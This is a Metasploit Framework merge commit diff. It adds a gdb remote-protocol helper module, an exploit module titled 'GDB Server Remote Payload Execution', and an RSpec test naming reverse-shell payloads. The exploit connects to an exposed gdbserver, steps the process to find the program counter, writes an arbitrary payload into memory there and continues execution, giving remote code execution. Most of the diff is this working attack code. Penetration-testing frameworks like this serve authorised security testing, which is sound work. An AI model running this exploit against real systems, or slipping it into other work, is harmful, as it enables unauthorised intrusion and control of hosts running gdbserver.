Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
16502b831f
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@ -404,6 +404,15 @@ class EncodedPayload
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Msf::Util::EXE.to_jsp_war(encoded_exe(opts), opts)
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end
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#
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# An array containing the architecture(s) that this payload was made to run on
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#
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def arch
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if pinst
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pinst.arch
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end
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end
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#
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# The raw version of the payload
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#
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@ -0,0 +1,190 @@
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# -*- coding: binary -*-
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require 'msf/core/exploit/tcp'
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module Msf
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#
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# Implement some helpers for communicating with a remote gdb instance.
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#
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# More info on the gdb protocol can be found here:
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# https://sourceware.org/gdb/current/onlinedocs/gdb/Overview.html#Overview
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#
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module Exploit::Remote::Gdb
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include Msf::Exploit::Remote::Tcp
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# thrown when an expected ACK packet is never received
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class BadAckError < RuntimeError; end
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# thrown when a response is incorrect
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class BadResponseError < RuntimeError; end
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# thrown when a checksum is invalid
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class BadChecksumError < RuntimeError; end
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# Default list of supported GDB features to send the to the target
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GDB_FEATURES = 'qSupported:multiprocess+;qRelocInsn+;qvCont+;'
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# Maps index of register in GDB that holds $PC to architecture
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PC_REGISTERS = {
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'08' => ARCH_X86,
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'10' => ARCH_X86_64
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}
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# Send an ACK packet
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def send_ack
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sock.put('+')
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vprint_status('Sending ack...')
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end
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# Reads an ACK packet from the wire
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# @raise [BadAckError] if a bad ACK is received
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def read_ack
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unless sock.get_once(1) == '+'
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raise BadAckError
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end
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vprint_status('Received ack...')
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end
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# Sends a command and receives an ACK from the remote.
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# @param cmd [String] the gdb command to run. The command is will be
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# wrapped '$' prefix and checksum.
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def send_cmd(cmd)
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full_cmd = '$' + cmd + '#' + checksum(cmd)
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vprint_status('Sending cmd: '+full_cmd)
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sock.put(full_cmd)
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read_ack
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end
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# Reads (and possibly decodes) from the socket and sends an ACK to verify receipt
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# @param opts [Hash] the options hash
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# @option opts :decode [Boolean] rle decoding should be applied to the response
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# @option opts :verify [Boolean] verify the response's checksum
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# @return [String] the response
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# @raise [BadResponseError] if the expected response is missing
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# @raise [BadChecksumError] if the checksum is invalid
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def read_response(opts={})
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decode, verify = opts.fetch(:decode, false), opts.fetch(:verify, true)
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res = sock.get_once
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raise BadResponseError if res.nil?
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raise BadChecksumError if (verify && !verify_checksum(res))
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res = decode_rle(res) if decode
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vprint_status('Result: '+res)
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send_ack
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res
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end
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# Implements decoding of gdbserver's Run-Length-Encoding that is applied
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# on some hex values to collapse repeated characters.
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#
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# https://sourceware.org/gdb/current/onlinedocs/gdb/Overview.html#Binary-Data
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#
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# @param msg [String] the message to decode
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# @return [String] the decoded result
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def decode_rle(msg)
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vprint_status "Before decoding: #{msg}"
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msg.gsub /.\*./ do |match|
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match.bytes.to_a.first.chr * (match.bytes.to_a.last - 29 + 1)
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end
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end
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# The two-digit checksum is computed as the modulo 256 sum of all characters
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# between the leading ‘$’ and the trailing ‘#’ (an eight bit unsigned checksum).
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# @param str [String] the string to calculate the checksum of
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# @return [String] hex string containing checksum
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def checksum(str)
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"%02x" % str.bytes.inject(0) { |b, sum| (sum+b)%256 }
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end
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# Verifies a response's checksum
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# @param res [String] the response to check
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# @return [Boolean] whether the checksum is valid
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def verify_checksum(res)
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msg, chksum = res.match(/^\$(.*)#(\h{2})$/)[1..2]
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checksum(msg) == chksum
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end
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# Writes the buffer +buf+ to the address +addr+ in the remote process's memory
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# @param buf [String] the buffer to write
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# @param addr [String] the hex-encoded address to write to
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def write(buf, addr)
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hex = Rex::Text.to_hex(buf, '')
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send_cmd "M#{addr},#{buf.length.to_s(16)}:#{hex}"
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read_response
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end
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# Steps execution and finds $PC pointer and architecture
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# @return [Hash] with :arch and :pc keys containing architecture and PC pointer
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# @raise [BadResponseError] if necessary data is missing
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def process_info
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data = step
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pc_data = data.split(';')[2]
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raise BadResponseError if pc_data.nil?
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pc_data = pc_data.split(':')
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my_arch = PC_REGISTERS[pc_data[0]]
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pc = pc_data[1]
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if my_arch.nil?
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raise RuntimeError, "Could not detect a supported arch from response to step:\n#{pc_data}"
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end
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{
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arch: my_arch,
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pc: Rex::Text.to_hex(Rex::Arch.pack_addr(my_arch, Integer(pc, 16)), ''),
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pc_raw: Integer(pc, 16)
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}
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end
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# Continues execution of the remote process
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# @param opts [Hash] the options hash
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# @option opts :read [Boolean] read the response
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def continue(opts={})
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send_cmd 'vCont;c'
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read_response if opts.fetch(:read, true)
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end
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# Detaches from the remote process
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# @param opts [Hash] the options hash
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# @option opts :read [Boolean] read the response
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def detach(opts={})
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send_cmd 'D'
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read_response if opts.fetch(:read, true)
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end
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# Executes one instruction on the remote process
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#
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# The results of running "step" will look like:
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# x86: $T0505:00000000;04:a0f7ffbf;08:d2f0fdb7;thread:p2d39.2d39;core:0;#53
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# x64: $T0506:0000000000000000;07:b0587f9fff7f0000;10:d3e29d03057f0000;thread:p8bf9.8bf9;core:0;#df
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# The third comma-separated field will contain EIP, and the register index
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# will let us deduce the remote architecture (through PC_REGISTERS lookup)
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#
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# @return [String] a list of key/value pairs, including current PC
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def step
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send_cmd 'vCont;s'
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read_response(decode: true)
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end
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def run(filename)
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send_cmd "vRun;#{Rex::Text.to_hex(filename, '')}"
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read_response
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end
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def enable_extended_mode
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send_cmd("!")
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read_response
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end
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# Performs a handshake packet exchange
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# @param features [String] the list of supported features to tell the remote
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# host that the client supports (defaults to +DEFAULT_GDB_FEATURES+)
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def handshake(features=GDB_FEATURES)
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send_cmd features
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read_response # lots of flags, nothing interesting
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end
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end
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end
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@ -47,6 +47,7 @@ require 'msf/core/exploit/snmp'
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require 'msf/core/exploit/arkeia'
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require 'msf/core/exploit/ndmp'
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require 'msf/core/exploit/imap'
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require 'msf/core/exploit/gdb'
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require 'msf/core/exploit/smtp_deliver'
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require 'msf/core/exploit/pop2'
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require 'msf/core/exploit/tns'
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@ -48,7 +48,7 @@ module Arch
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case arch
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when ARCH_X86
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[addr].pack('V')
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when ARCH_X86_64
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when ARCH_X86_64, ARCH_X64
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[addr].pack('Q<')
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when ARCH_MIPS # ambiguous
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[addr].pack('N')
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@ -0,0 +1,79 @@
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##
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# This module requires Metasploit: http//metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = GreatRanking
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include Msf::Exploit::Remote::Gdb
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'GDB Server Remote Payload Execution',
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'Description' => %q{
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This module attempts to execute an arbitrary payload on a gdbserver service.
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},
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'Author' => [ 'joev' ],
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'Targets' => [
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[ 'x86 (32-bit)', { 'Arch' => ARCH_X86 } ],
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[ 'x86_64 (64-bit)', { 'Arch' => ARCH_X86_64 } ]
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],
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'Platform' => %w(linux unix osx),
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'DefaultTarget' => 0,
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'DefaultOptions' => {
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'PrependFork' => true
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}
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))
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register_options([
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OptString.new('EXE_FILE', [
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false,
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"The exe to spawn when gdbserver is not attached to a process.",
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'/bin/true'
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])
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], self.class)
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end
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def exploit
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connect
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print_status "Performing handshake with gdbserver..."
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handshake
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enable_extended_mode
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begin
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print_status "Stepping program to find PC..."
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gdb_data = process_info
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rescue BadAckError, BadResponseError
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# gdbserver is running with the --multi flag and is not currently
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# attached to any process. let's attach to /bin/true or something.
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print_status "No process loaded, attempting to load /bin/true..."
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run(datastore['EXE_FILE'])
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gdb_data = process_info
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end
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gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
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unless payload.arch.include? gdb_arch
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fail_with(
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Msf::Exploit::Failure::BadConfig,
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"The payload architecture is incorrect: "+
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"the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb."
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)
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end
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print_status "Writing payload at #{gdb_pc}..."
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write(payload.encoded, gdb_pc)
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print_status "Executing the payload..."
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continue
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handler
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disconnect
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end
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end
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@ -0,0 +1,55 @@
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require 'spec_helper'
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require 'msf/core/encoded_payload'
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describe Msf::EncodedPayload do
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PAYLOAD_FRAMEWORK = Msf::Simple::Framework.create(
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:module_types => [::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP],
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'DisableDatabase' => true,
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'DisableLogging' => true
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)
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let(:framework) { PAYLOAD_FRAMEWORK }
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let(:payload) { 'linux/x86/shell_reverse_tcp' }
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let(:pinst) { framework.payloads.create(payload) }
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subject(:encoded_payload) do
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described_class.new(framework, pinst, {})
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end
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it 'is an Msf::EncodedPayload' do
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expect(encoded_payload).to be_a(described_class)
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end
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describe '.create' do
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context 'when passed a valid payload instance' do
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# don't ever actually generate payload bytes
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before { described_class.any_instance.stub(:generate) }
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it 'returns an Msf::EncodedPayload instance' do
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expect(described_class.create(pinst)).to be_a(described_class)
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end
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end
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end
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describe '#arch' do
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context 'when payload is linux/x86 reverse tcp' do
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let(:payload) { 'linux/x86/shell_reverse_tcp' }
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it 'returns ["X86"]' do
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expect(encoded_payload.arch).to eq [ARCH_X86]
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end
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end
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context 'when payload is linux/x64 reverse tcp' do
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let(:payload) { 'linux/x64/shell_reverse_tcp' }
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it 'returns ["X86_64"]' do
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expect(encoded_payload.arch).to eq [ARCH_X86_64]
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end
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end
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end
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end
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